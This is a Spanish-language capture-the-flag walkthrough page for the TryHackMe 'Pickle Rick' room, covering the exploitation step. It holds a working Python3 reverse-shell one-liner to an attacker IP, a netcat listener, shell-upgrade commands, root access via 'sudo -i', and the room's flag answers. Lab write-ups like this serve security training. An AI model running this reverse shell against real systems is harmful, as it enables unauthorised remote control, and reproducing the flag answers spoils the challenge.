<!DOCTYPE html>
<!--[if IE 8]><html class="no-js lt-ie9" lang="en" > <![endif]-->
<!--[if gt IE 8]><!--> <html class="no-js" lang="en" > <!--<![endif]-->
<head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  
  
  
  <link rel="shortcut icon" href="../img/favicon.ico">
  <title>2. Explotando >_< - Pickle Rick Machine THM</title>
  <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Lato:400,700|Roboto+Slab:400,700|Inconsolata:400,700" />

  <link rel="stylesheet" href="../css/theme.css" />
  <link rel="stylesheet" href="../css/theme_extra.css" />
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/10.5.0/styles/github.min.css" />
  
  <script>
    // Current page data
    var mkdocs_page_name = "2. Explotando >_<";
    var mkdocs_page_input_path = "explotacion.md";
    var mkdocs_page_url = null;
  </script>
  
  <script src="../js/jquery-2.1.1.min.js" defer></script>
  <script src="../js/modernizr-2.8.3.min.js" defer></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/10.5.0/highlight.min.js"></script>
  <script>hljs.initHighlightingOnLoad();</script> 
</head>

<body class="wy-body-for-nav" role="document">

  <div class="wy-grid-for-nav">

    
    <nav data-toggle="wy-nav-shift" class="wy-nav-side stickynav">
    <div class="wy-side-scroll">
      <div class="wy-side-nav-search">
        <a href=".." class="icon icon-home"> Pickle Rick Machine THM</a>
        <div role="search">
  <form id ="rtd-search-form" class="wy-form" action="../search.html" method="get">
      <input type="text" name="q" placeholder="Search docs" title="Type search term here" />
  </form>
</div>
      </div>

      <div class="wy-menu wy-menu-vertical" data-spy="affix" role="navigation" aria-label="main navigation">
                <ul>
                    <li class="toctree-l1"><a class="reference internal" href="..">Home</a>
                    </li>
                </ul>
                <ul>
                    <li class="toctree-l1"><a class="reference internal" href="../enumeracion/">1. Enumeración BB >_<</a>
                    </li>
                </ul>
                <ul class="current">
                    <li class="toctree-l1 current"><a class="reference internal current" href="./">2. Explotando >_<</a>
    <ul class="current">
    </ul>
                    </li>
                </ul>
      </div>
    </div>
    </nav>

    <section data-toggle="wy-nav-shift" class="wy-nav-content-wrap">

      
      <nav class="wy-nav-top" role="navigation" aria-label="top navigation">
        <i data-toggle="wy-nav-top" class="fa fa-bars"></i>
        <a href="..">Pickle Rick Machine THM</a>
      </nav>

      
      <div class="wy-nav-content">
        <div class="rst-content">
          <div role="navigation" aria-label="breadcrumbs navigation">
  <ul class="wy-breadcrumbs">
    <li><a href="..">Docs</a> &raquo;</li>
    
      
    
    <li>2. Explotando >_<</li>
    <li class="wy-breadcrumbs-aside">
      
    </li>
  </ul>
  
  <hr/>
</div>

          <div role="main">
            <div class="section">
              
                <h1 id="pa-dentrooooooooo">Pa dentrooooooooo !!!!!</h1>
<p>Sabemos que tenemos un usuario y una contraseña potencial, así que intentaremos.</p>
<pre><code class="language-bash">Username: R1ckRul3s
Password: Wubbalubbadubdub
</code></pre>
<p><strong>Perfecto !!!</strong> hemos obtenido acceso.</p>
<p>Tenemos varias secciones, pero si les soy sincero, me interesa más la de commands.</p>
<p><img alt="rId20" src="../img/rId31.png" /></p>
<p>Algo que podemos realizar es ver, si podemos ejecutar comandos directamente desde aquí, daremos un ls, y vemos que podemos contestar la primera pregunta si hacemos un <strong>cat Sup3rS3cretPickl3Ingred.txt</strong></p>
<p><img alt="rId20" src="../img/rId33.png" /></p>
<p>Vemos que la página es un poco troll, y al hacer cat no nos deja, pues... lo que haremos es ver si podemos hacer ejecución de otros binarios que nos puedan permitir una reverse shell, por ejemplo con python 3, si usamos el siguiente comando podemos comprobar:</p>
<pre><code class="language-bash">python3 -c &quot;print('Jamiel')&quot;
</code></pre>
<p><img alt="rId20" src="../img/rId35.png" /></p>
<p><strong>Yupii !!!!</strong> Vemos que tenemos ejecución, por lo tanto usaremos in oneliner con python3 que nos permitirá ganar acceso a la máquina directamente: </p>
<pre><code class="language-bash">python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;10.2.54.248&quot;,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([&quot;/bin/sh&quot;,&quot;-i&quot;]);'
</code></pre>
<p>Para esto en paralelo tendremos que correr nuestro netcat en nuestra terminal:</p>
<pre><code class="language-bash">nc -lnvp 1234
</code></pre>
<div class="admonition info">
<p class="admonition-title">Info</p>
<p><strong>Esto se tiene que hacer antes de ejecutar el onliner de python3</strong></p>
</div>
<p>Una vez tengamos ready el el <strong>netcat</strong>, ejecutamos nuestro <strong>oneliner</strong>, recordar que tenemos que ajustar la ip y el puerto según nuestros requerimientos y pufff, hemos obtenido acceso al serv.</p>
<p><img alt="rId20" src="../img/rId37.png" /></p>
<p>Ahora si podemos ver el primer ingrediente</p>
<p><img alt="rId20" src="../img/rId39.png" /></p>
<p><strong>mr. meeseek hair</strong></p>
<p>Una buena práctica es ejecutar las siguientes lineas mostradas abajo, para poder crear una consola mucho más interactiva:</p>
<pre><code class="language-bash">script /dev/null -c bash
control z
stty raw -echo; fg
reset
xterm
export TERM=xterm
export SHELL=bash
</code></pre>
<p>Ya que tenemos nuestra consola interactiva, procedemos a buscar nuestro segundo ingrediente. Primero buscaremos entre los archivos de la ruta /var/www/html, me encontré que el archivo clue.txt dice lo mostrado en la imagen.</p>
<p><img alt="rId20" src="../img/rId41.png" /></p>
<div class="admonition pregunta-1">
<p class="admonition-title">Pregunta-1</p>
<p><strong>What is the first ingredient Rick needs?</strong></p>
<p>mr. meeseek hair</p>
</div>
<hr />
<p>Leido lo que dice el archivo, y deduciendo que es una máquina easy, fuimos a home, encontramos un user llamado rick, accedemos a su dir y encontraremos al archivo que buscamos.</p>
<p><img alt="rId20" src="../img/rId43.png" /></p>
<div class="admonition pregunta-2">
<p class="admonition-title">Pregunta-2</p>
<p><strong>Whats the second ingredient Rick needs?</strong></p>
<p>1 jerry tear</p>
</div>
<hr />
<p>Por deducción, imagino que el tercer archivo debe estar dentro de root, pero para poder acceder a este dir necesitamos tener privilegios, uno de los comandos más comunes que tenemos que utilizar es "<strong>sudo -i</strong>" y efectivamente tenemos el root, ya podemos dirigirnos a /root y hacerle un cat a nuestro tercer archivo.</p>
<p><img alt="rId20" src="../img/rId45.png" /></p>
<div class="admonition pregunta-3">
<p class="admonition-title">Pregunta-3</p>
<p><strong>Whats the final ingredient Rick needs?</strong></p>
<p>fleeb juice</p>
</div>
              
            </div>
          </div>
          <footer>
  
    <div class="rst-footer-buttons" role="navigation" aria-label="footer navigation">
      
      
        <a href="../enumeracion/" class="btn btn-neutral" title="1. Enumeración BB >_<"><span class="icon icon-circle-arrow-left"></span> Previous</a>
      
    </div>
  

  <hr/>

  <div role="contentinfo">
    <!-- Copyright etc -->
    
  </div>

  Built with <a href="https://www.mkdocs.org/">MkDocs</a> using a <a href="https://github.com/snide/sphinx_rtd_theme">theme</a> provided by <a href="https://readthedocs.org">Read the Docs</a>.
</footer>
      
        </div>
      </div>

    </section>

  </div>

  <div class="rst-versions" role="note" aria-label="versions">
  <span class="rst-current-version" data-toggle="rst-current-version">
    
    
      <span><a href="../enumeracion/" style="color: #fcfcfc">&laquo; Previous</a></span>
    
    
  </span>
</div>
    <script>var base_url = '..';</script>
    <script src="../js/theme_extra.js" defer></script>
    <script src="../js/theme.js" defer></script>
      <script src="../search/main.js" defer></script>
    <script defer>
        window.onload = function () {
            SphinxRtdTheme.Navigation.enable(true);
        };
    </script>

</body>
</html>
